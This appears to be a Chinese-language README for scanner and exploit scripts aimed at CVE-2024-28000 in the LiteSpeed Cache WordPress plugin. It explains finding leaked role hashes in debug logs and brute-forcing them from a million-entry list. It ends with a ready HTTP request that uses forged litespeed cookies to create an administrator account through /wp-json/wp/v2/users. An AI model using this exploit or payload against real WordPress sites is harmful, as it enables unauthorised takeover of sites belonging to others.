- 该脚本首先会识别版本,判断是否为易损版本,后尝试确认log文件是否存在,若存在,则会尝试发包后再次请求log文件尝试查找hash泄露,若LiteSpeed启用debug,则有可能泄露正确Hash
usage: CVE-2024-28000_Scan.py [-h] [-f F] [-t T] [-p PROXY]
CVE-2024-28000 Scan
optional arguments:
-h, --help show this help message and exit
-f F File list
-t T Scan thread
-p PROXY, --proxy PROXY
Example: socks5://127.0.0.1:10808
示例:
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] 💓 ------POST HTTP/1.1 (HTTPS) /wp-json/wp/v2/users
09/08/24 16:30:38.219 [0.0.0.0:26008 1 TG9] Query String:
09/08/24 16:30:38.231 [0.0.0.0:26008 1 TG9] [Router] starting role validation
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] hash not match zasws5 != pkHrfD
09/08/24 16:30:38.232 [0.0.0.0:26008 1 TG9] [Router] get_role:
09/08/24 16:30:38.241 [0.0.0.0:26008 1 TG9] [Optm] init
若LiteSpeed启用debug,则可能看到类似的上面的日志,其中pkHrfD则为正确Hash
- 经测试 Python和PHP生成的Hash是有差异的,故Hash列表并不能用Python模拟生成,Hash_list.txt文件为php生成的1000000个Hash,所以理论上遍历最高1000000次则可以遍历到正确Hash
usage: CVE-2024-28000_Exploit.py [-h] [-u U] [-t T] [-d D] [-p PROXY]
CVE-2024-28000
optional arguments:
-h, --help show this help message and exit
-u U url
-t T Scan thread
-d D Dict list
-p PROXY, --proxy PROXY
Example: socks5://127.0.0.1:10808
- -d参数则为Hash列表 -u为url -t为线程数,线程不建议过高
- 在靶场测试是可以成功遍历出Hash,并且重装五遍都已经确认Hash是在生成的Hash列表中的,但是多种方面表面实战利用成功率较低
- 在成功找到正确Hash后可用下面的数据包添加admin用户
POST /wp-json/wp/v2/users HTTP/2
Host: xxx.com
User-Agent: python-requests/2.28.1
Accept-Encoding: gzip, deflate, br
Accept: */*
Cookie: litespeed_hash=正确Hash; litespeed_role=1
Content-Length: 122
Content-Type: application/json
{"username": "username", "password": "password", "email": "[email protected]", "roles": ["administrator"]}